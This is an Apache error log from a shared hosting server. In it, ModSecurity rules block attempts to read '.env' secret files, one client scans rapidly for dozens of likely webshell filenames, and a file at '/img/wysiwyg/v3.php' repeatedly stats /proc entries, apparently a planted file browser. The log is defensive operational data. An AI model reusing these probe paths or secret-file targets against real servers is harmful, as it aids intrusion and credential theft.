PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704672/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704672/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704672/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/share/doc/hunspell/README in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/doc/hunspell/README in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/197/task/197/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/197/task/197/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/197/task/197/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/197/task/197/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/197/task/197/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/197/task/197/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:33:56.804685 2026] [:error] [pid 1695975:tid 1695985] [client 91.224.92.99:60145] File does not exist: /var/www/html/xmlrpc.php
[Tue May 12 02:34:06.056853 2026] [security2:error] [pid 1695975:tid 1695997] [client 176.65.139.229:38010] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ1ftVI9ymHBxup74-KIQAAAJM"]
[Tue May 12 02:34:06.057094 2026] [security2:error] [pid 1695975:tid 1695997] [client 176.65.139.229:38010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ1ftVI9ymHBxup74-KIQAAAJM"]
[Tue May 12 02:34:07.225223 2026] [security2:error] [pid 1695975:tid 1695997] [client 176.65.139.229:38010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ1ftVI9ymHBxup74-KIQAAAJM"]
[Tue May 12 02:34:08.063994 2026] [security2:error] [pid 1730175:tid 1730189] [client 176.65.139.236:39688] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ1gHo6NvB9WXx5V-53NgAAAQw"]
[Tue May 12 02:34:08.064216 2026] [security2:error] [pid 1730175:tid 1730189] [client 176.65.139.236:39688] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ1gHo6NvB9WXx5V-53NgAAAQw"]
[Tue May 12 02:34:09.286085 2026] [security2:error] [pid 1730175:tid 1730189] [client 176.65.139.236:39688] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJ1gHo6NvB9WXx5V-53NgAAAQw"]
[Tue May 12 02:34:53.644786 2026] [security2:error] [pid 1707624:tid 1707699] [client 43.128.156.124:34200] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJ1rbOxS7i6i_mT2NLGRQAAAFE"]
[Tue May 12 02:34:53.852745 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/hhf.php
[Tue May 12 02:34:53.943618 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/amba5.php
[Tue May 12 02:34:54.160403 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/fvvff.php
[Tue May 12 02:34:54.383895 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/about.php
[Tue May 12 02:34:54.568033 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/tfm.php
[Tue May 12 02:34:54.719730 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-good.php
[Tue May 12 02:34:54.889266 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ioxi-o.php
[Tue May 12 02:34:54.980161 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/edit.php
[Tue May 12 02:34:55.077125 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/inputs.php
[Tue May 12 02:34:55.168950 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/a7.php
[Tue May 12 02:34:55.261369 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ms-edit.php
[Tue May 12 02:34:55.383055 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/insta.php
[Tue May 12 02:34:55.628296 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/t.php
[Tue May 12 02:34:55.719139 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/s.php
[Tue May 12 02:34:56.039646 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/CDX6.php
[Tue May 12 02:34:56.147180 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/100.php
[Tue May 12 02:34:56.361767 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/0x.php
[Tue May 12 02:34:56.456027 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/abc.php
[Tue May 12 02:34:56.582703 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/drykl.php
[Tue May 12 02:34:56.673892 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/term.php
[Tue May 12 02:34:56.766058 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/155.php
[Tue May 12 02:34:57.115833 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/bolt.php
[Tue May 12 02:34:57.369337 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/koiy.php
[Tue May 12 02:34:57.461153 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/amp.php
[Tue May 12 02:34:57.660661 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/solo1.php
[Tue May 12 02:34:57.753943 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/8.php
[Tue May 12 02:34:57.844713 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/jp.php
[Tue May 12 02:34:57.943401 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/jga.php
[Tue May 12 02:34:58.034892 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/gelio1.php
[Tue May 12 02:34:58.126444 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/222.php
[Tue May 12 02:34:58.320550 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/666.php
[Tue May 12 02:34:58.422953 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/166.php
[Tue May 12 02:34:58.524708 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/classwithtostring.php
[Tue May 12 02:34:58.645280 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/tool.php
[Tue May 12 02:34:58.782655 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/file61.php
[Tue May 12 02:34:58.918701 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/atomlib.php
[Tue May 12 02:34:59.011792 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/elp.php
[Tue May 12 02:34:59.130479 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-blog-header.php
[Tue May 12 02:34:59.234905 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/gk.php
[Tue May 12 02:34:59.326637 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wen.php
[Tue May 12 02:34:59.433197 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/cilus.php
[Tue May 12 02:34:59.613253 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-p2r3q9c8k4.php
[Tue May 12 02:34:59.799461 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/tires.php
[Tue May 12 02:35:00.133835 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp9.php
[Tue May 12 02:35:00.332626 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/xltt.php
[Tue May 12 02:35:00.612433 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/menu.php
[Tue May 12 02:35:00.716451 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/1.php
[Tue May 12 02:35:00.810044 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-access.php
[Tue May 12 02:35:00.911566 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-png.php
[Tue May 12 02:35:01.002392 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/144.php
[Tue May 12 02:35:01.570068 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/asasx.php
[Tue May 12 02:35:01.676912 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/asd.php
[Tue May 12 02:35:01.768174 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws75.php
[Tue May 12 02:35:01.885715 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/academy.php
[Tue May 12 02:35:02.242527 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws86.php
[Tue May 12 02:35:02.333592 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/b.php
[Tue May 12 02:35:02.424530 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/amax.php
[Tue May 12 02:35:02.640030 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/as.php
[Tue May 12 02:35:02.735843 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/xa.php
[Tue May 12 02:35:02.832788 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/kj.php
[Tue May 12 02:35:02.951963 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/gettest.php
[Tue May 12 02:35:03.059124 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/fff.php
[Tue May 12 02:35:03.150026 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ortasekerli1.php
[Tue May 12 02:35:03.260916 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/gifclass.php
[Tue May 12 02:35:03.352053 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/motu.php
[Tue May 12 02:35:03.447483 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/Sanskrit.php
[Tue May 12 02:35:03.648407 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/green.php
[Tue May 12 02:35:03.739334 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws83.php
[Tue May 12 02:35:03.829895 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/bthil.php
[Tue May 12 02:35:04.009544 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/mh.php
[Tue May 12 02:35:04.111615 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/fs.php
[Tue May 12 02:35:04.203954 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/albin.php
[Tue May 12 02:35:04.301554 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/file.php
[Tue May 12 02:35:04.392499 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws80.php
[Tue May 12 02:35:04.483213 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/bgymj.php
[Tue May 12 02:35:04.597050 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wper.php
[Tue May 12 02:35:04.780684 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wtiiy.php
[Tue May 12 02:35:04.872016 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/xwx1.php
[Tue May 12 02:35:04.974411 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/a4.php
[Tue May 12 02:35:05.065297 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-blog.php
[Tue May 12 02:35:05.307901 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws85.php
[Tue May 12 02:35:05.399897 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws88.php
[Tue May 12 02:35:05.492409 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/wp-blogs.php
[Tue May 12 02:35:05.595229 2026] [:error] [pid 1730175:tid 1730190] [client 20.63.80.119:59803] File does not exist: /var/www/html/ws78.php
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704909/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704909/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704909/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704909/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704909/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704909/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:35:19.789390 2026] [security2:error] [pid 1709071:tid 1709090] [client 43.134.187.251:55304] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-fete-est-finie/"] [unique_id "agJ1x7vMumyrWMfSu7qnxAAAAMM"]
[Tue May 12 02:35:46.719001 2026] [autoindex:error] [pid 1730207:tid 1730223] [client 114.119.155.96:40791] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://totalcloud.fr/
[Tue May 12 02:36:00.395115 2026] [ssl:error] [pid 1695975:tid 1696000] (EAI 2)Name or service not known: [client 64.23.148.210:45836] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:00.395496 2026] [ssl:error] [pid 1695975:tid 1696000] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:01.695225 2026] [ssl:error] [pid 1730207:tid 1730226] (EAI 2)Name or service not known: [client 212.103.56.255:44261] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:01.695343 2026] [ssl:error] [pid 1730207:tid 1730226] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:03.050434 2026] [ssl:error] [pid 1709071:tid 1709104] (EAI 2)Name or service not known: [client 178.209.66.30:45433] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:03.050474 2026] [ssl:error] [pid 1709071:tid 1709104] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:12.456021 2026] [ssl:error] [pid 1695975:tid 1695990] (EAI 2)Name or service not known: [client 134.199.215.240:59946] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:12.456062 2026] [ssl:error] [pid 1695975:tid 1695990] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:14.071265 2026] [ssl:error] [pid 1695975:tid 1695985] (EAI 2)Name or service not known: [client 136.227.164.207:43627] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:14.071292 2026] [ssl:error] [pid 1695975:tid 1695985] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:16.929315 2026] [ssl:error] [pid 1707624:tid 1707697] (EAI 2)Name or service not known: [client 80.243.231.244:39543] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:16.929348 2026] [ssl:error] [pid 1707624:tid 1707697] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704669/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704669/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704669/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704669/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704669/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704669/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:36:23.744296 2026] [ssl:error] [pid 1709071:tid 1709089] (EAI 2)Name or service not known: [client 138.68.30.117:46428] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:23.744352 2026] [ssl:error] [pid 1709071:tid 1709089] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:27.902348 2026] [security2:error] [pid 1709071:tid 1709087] [client 43.166.255.122:42484] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.naturedetres.fr"] [uri "/"] [unique_id "agJ2C7vMumyrWMfSu7qoEwAAAMA"]
[Tue May 12 02:36:34.154383 2026] [ssl:error] [pid 1730207:tid 1730232] (EAI 2)Name or service not known: [client 143.110.132.250:38028] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:34.154429 2026] [ssl:error] [pid 1730207:tid 1730232] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:36.050507 2026] [ssl:error] [pid 1730207:tid 1730218] (EAI 2)Name or service not known: [client 206.204.10.46:33437] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:36.050538 2026] [ssl:error] [pid 1730207:tid 1730218] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:39.304962 2026] [ssl:error] [pid 1730207:tid 1730210] (EAI 2)Name or service not known: [client 78.41.85.40:40121] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:39.304995 2026] [ssl:error] [pid 1730207:tid 1730210] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:40.042939 2026] [ssl:error] [pid 1691274:tid 1691296] (EAI 2)Name or service not known: [client 80.43.25.159:39161] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:36:40.042984 2026] [ssl:error] [pid 1691274:tid 1691296] AH01941: stapling_renew_response: responder error
[Tue May 12 02:36:51.510589 2026] [security2:error] [pid 1695975:tid 1695999] [client 129.211.172.249:39270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.fr"] [uri "/"] [unique_id "agJ2I9VI9ymHBxup74-KsgAAAJU"]
[Tue May 12 02:36:52.052741 2026] [security2:error] [pid 1709071:tid 1709090] [client 129.211.172.249:39864] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.com"] [uri "/"] [unique_id "agJ2JLvMumyrWMfSu7qoJgAAAMM"]
[Tue May 12 02:36:53.515612 2026] [security2:error] [pid 1709071:tid 1709089] [client 18.213.240.226:58201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/topfreecamsites.com"] [unique_id "agJ2JbvMumyrWMfSu7qoJwAAAMI"]
